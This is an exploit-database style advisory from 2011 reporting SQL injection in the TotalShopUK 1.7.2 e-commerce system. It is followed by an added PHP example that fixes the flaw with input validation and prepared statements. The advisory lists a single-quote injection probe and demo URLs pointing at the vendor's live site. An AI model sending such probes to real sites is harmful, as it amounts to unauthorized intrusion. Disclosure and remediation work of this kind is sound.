TotalShopUK version 1.7.2 suffers from a remote SQL injection vulnerability.
# Exploit Title: TotalShopUK (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.totalshopuk.com
# Version: 1.7.2
# Tested on: All versions are vulnerable
ISSUE
SQL injection is possible through the command input.
Exploit:
products/c/index.php/1'
Demo:
http://www.totalshopuk.com/products/c/index.php/1'
http://www.totalshopuk.com/products/c/laptops/1'
Thanks,
Eyüp CELIK
Information Technologies Security Specialist
http://www.eyupcelik.com.tr
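
For defenders, the fix for this class of bug is to validate the trailing path segment and pass it to the database as a bound parameter. The PHP below is an added example, not TotalShopUK code and not part of the original advisory; the `products` table, its columns and both function names are hypothetical, since the advisory does not show the application's source or schema.

```php
<?php
declare(strict_types=1);

// Added example. Schema and function names are assumptions, not TotalShopUK's.

/** Return the trailing path segment as a positive integer id, or null if it is not one. */
function categoryIdFromPath(string $path): ?int
{
    $segments = explode('/', rtrim($path, '/'));
    $last = rawurldecode((string) end($segments));
    // Digits only, bounded length: a value such as "1'" fails here and never reaches SQL.
    if (preg_match('/\A[1-9][0-9]{0,8}\z/', $last) !== 1) {
        return null;
    }
    return (int) $last;
}

/** Look up products with a bound parameter, so the id is data and never SQL text. */
function productsInCategory(PDO $db, int $categoryId): array
{
    $stmt = $db->prepare('SELECT id, name FROM products WHERE category_id = :cid ORDER BY id');
    $stmt->bindValue(':cid', $categoryId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, category_id INTEGER, name TEXT)');
$db->exec("INSERT INTO products (category_id, name) VALUES (1, 'Laptop A'), (1, 'Laptop B'), (2, 'Phone C')");

// Constructed request paths: one normal request and the two shapes from the advisory.
$paths = ['/products/c/index.php/1', "/products/c/index.php/1'", "/products/c/laptops/1'"];
foreach ($paths as $path) {
    $id = categoryIdFromPath($path);
    if ($id === null) {
        // Answer with a generic 404; database error text must never reach the client.
        echo $path, " => rejected (404)\n";
        continue;
    }
    echo $path, ' => ', count(productsInCategory($db, $id)), " rows\n";
}
```

The validation and the bound parameter are independent layers: the prepared statement alone already keeps the quote from being parsed as SQL, and the validator additionally gives a clean 404 instead of a query against a nonsensical id.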